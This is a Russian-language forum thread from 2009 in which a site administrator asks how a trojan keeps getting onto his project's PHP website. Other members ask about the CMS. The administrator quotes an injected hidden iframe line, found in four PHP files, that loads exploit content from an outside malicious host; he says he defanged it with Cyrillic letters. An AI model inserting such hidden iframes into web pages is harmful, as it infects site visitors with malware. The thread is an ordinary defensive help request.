Есть вопрос?
Зайди на форум

Поиск на сайте: Advanced

Denix - новый дистрибутив Linux. Русификация Ubuntu и установка кодеков

dkws.org.ua
Форум сайта dkws.org.ua
 
ТемыТемы    АльбомАльбом    РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Я - пользователь Denix. Пожалуйста перейдите по этой ссылке, если вы скачали текущую или одну из предыдущих версий Denix. Это просто счетчик для подстчета количества пользователей.
Как обеспечить безопасность сайта?
На страницу 1, 2  След.
 
Начать новую тему   Ответить на тему    Список форумов dkws.org.ua -> Безопасность
 
Автор Сообщение
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вс Сен 13, 2009 9:12 am    Заголовок сообщения: Как обеспечить безопасность сайта?
Ответить с цитатой

У нашего научно-образовательного проекта есть сайт. Примерно раз в полгода на нем заводится какой-нибудь вирус или троян. Как они туда попадают и что надо делать, чтобы избежать этого?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 9643
Откуда: Украина

СообщениеДобавлено: Вс Сен 13, 2009 3:39 pm    Заголовок сообщения:
Ответить с цитатой

в первую очередь нужно обезопасить компьютеры админиов, которые обновляют сайт Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вс Сен 13, 2009 4:08 pm    Заголовок сообщения:
Ответить с цитатой

На них установлен лицензионный "Касперский", который всё время обновляется. Пароли нигде никогда не сохраняем. Каждый раз вводим. По почте не пересылаем.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 9643
Откуда: Украина

СообщениеДобавлено: Пн Сен 14, 2009 4:59 am    Заголовок сообщения:
Ответить с цитатой

А какой движок на сайте?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Пн Сен 14, 2009 1:28 pm    Заголовок сообщения:
Ответить с цитатой

Движок нам делали на заказ. Если я что-нибудь не перепутал, он сделан на PHP 5, использует MySQL 4. Система администрирования CMS.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Tuxik

Тяпницо


Зарегистрирован: 02.07.2007
Сообщения: 1427

СообщениеДобавлено: Вт Сен 15, 2009 5:38 am    Заголовок сообщения:
Ответить с цитатой

petrelius1150, разных CMS много, например, joomla - та же CMS.
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 6:16 am    Заголовок сообщения:
Ответить с цитатой

Tuxik, а как узнать, какая у нас?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Tuxik

Тяпницо


Зарегистрирован: 02.07.2007
Сообщения: 1427

СообщениеДобавлено: Вт Сен 15, 2009 7:34 am    Заголовок сообщения:
Ответить с цитатой

1. Обратиться к разработчику сайта.
2. Посмотреть информацию внизу страницы сайта (и увидеть там, например, "Powered by PunBB" или "Сайт работает на UMI.CMS") )))
3. Посмотреть исходный текст странички.
4. Или вот так: http://www.xakep.ru/magazine/xa/104/052/2.asp )))
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
den

Старожил


Зарегистрирован: 31.01.2006
Сообщения: 9643
Откуда: Украина

СообщениеДобавлено: Вт Сен 15, 2009 8:25 am    Заголовок сообщения:
Ответить с цитатой

Tuxik, +1
Вернуться к началу
Посмотреть профиль Отправить личное сообщение dhsilabs@jabber.ru
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 9:11 am    Заголовок сообщения:
Ответить с цитатой

Обращаться к разработчику сайта не хочется, а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
yok

Участник тусовки


Зарегистрирован: 06.02.2008
Сообщения: 136
Откуда: krasnodar

СообщениеДобавлено: Вт Сен 15, 2009 10:44 am    Заголовок сообщения:
Ответить с цитатой

А как Вы определяете что на сайте вирусы?
У Вас сервер не локальный предполагаю, раз есть доступ по фтп. Хотя возможно и для локального.
Обычно сервер на юникс системах, а там виндовс вирусы лежат как на блюдечке.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 11:32 am    Заголовок сообщения:
Ответить с цитатой

Представьте, нашему руководителю проекта постоянно не везёт. Он который раз первым натыкается на эти вирусы. В результате, его компьютер оказывается заражённым и он несколько дней потом чистит его от вируса.
Выглядело это в последний раз так. После его сообщения я попробовал зайти на сайт и антивирус предупредил меня о трояне Exploit.JS.Pdfka.ti. Я зашел по FTP и обнаружил, что 4 файла *.php имеют сегодняшнюю дату создания, в отличие от остальных, датированных 2008 годом. В этих файлах я обнаружил добавленную строку:
<iframe src="http://kораеvа.sеrvеgаmе.соm:8О8О/ts/in.cgi?ореn6" width=821 height=0 style="visibility: hidden"></iframe>, которая, как я понял и является ссылкой на троян. Удалил эти строки, вроде всё нормализовалось. Только непонятно, как они туда попали?

Денис, не волнуйся, прежде чем поместить на твой сайт эту строку, я сделал так, что ссылка работать не будет, заменив латинские буквы на русские.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
petrelius1150

Участник тусовки


Зарегистрирован: 25.01.2009
Сообщения: 482
Откуда: С-Петербург, Россия

СообщениеДобавлено: Вт Сен 15, 2009 11:35 am    Заголовок сообщения:
Ответить с цитатой

Наш сайт www.agroatlas.ru
Он находится на сервере С-Петербургского государственного университета.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Tuxik

Тяпницо


Зарегистрирован: 02.07.2007
Сообщения: 1427

СообщениеДобавлено: Вт Сен 15, 2009 11:39 am    Заголовок сообщения:
Ответить с цитатой

petrelius1150 писал(а):
а так, несмотря на попытки использовать ваши советы, установить ничего не удаётся, хотя я имею полный доступ по ftp и в системы администрирования, которых 2 штуки

А подробности узнать можно? Ну, конкретный действия и чем они закончились? А то остается только догадываться.
В принципе, не исключено что CMS самописная. Но все же, полагаю, что была взята бесплатно распространяемая CMS и была модифицирована.

petrelius1150 писал(а):
Удалил эти строки, вроде всё нормализовалось

Все верно сделал!
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Tuxik

Тяпницо


Зарегистрирован: 02.07.2007
Сообщения: 1427

СообщениеДобавлено: Вт Сен 15, 2009 11:50 am    Заголовок сообщения:
Ответить с цитатой

Чего-то я вашего сайта у Кельникс студиос в портфолио не нашел http://www.kelnik.ru/portfolio/web/ Confused

А в админке (на входе в админку) тоже ничего нет?
_________________
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов dkws.org.ua -> Безопасность Часовой пояс: GMT
На страницу 1, 2  След.
Страница 1 из 2

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах



Linux coutner Rambler's Top100

TutHost - недорого и надежно.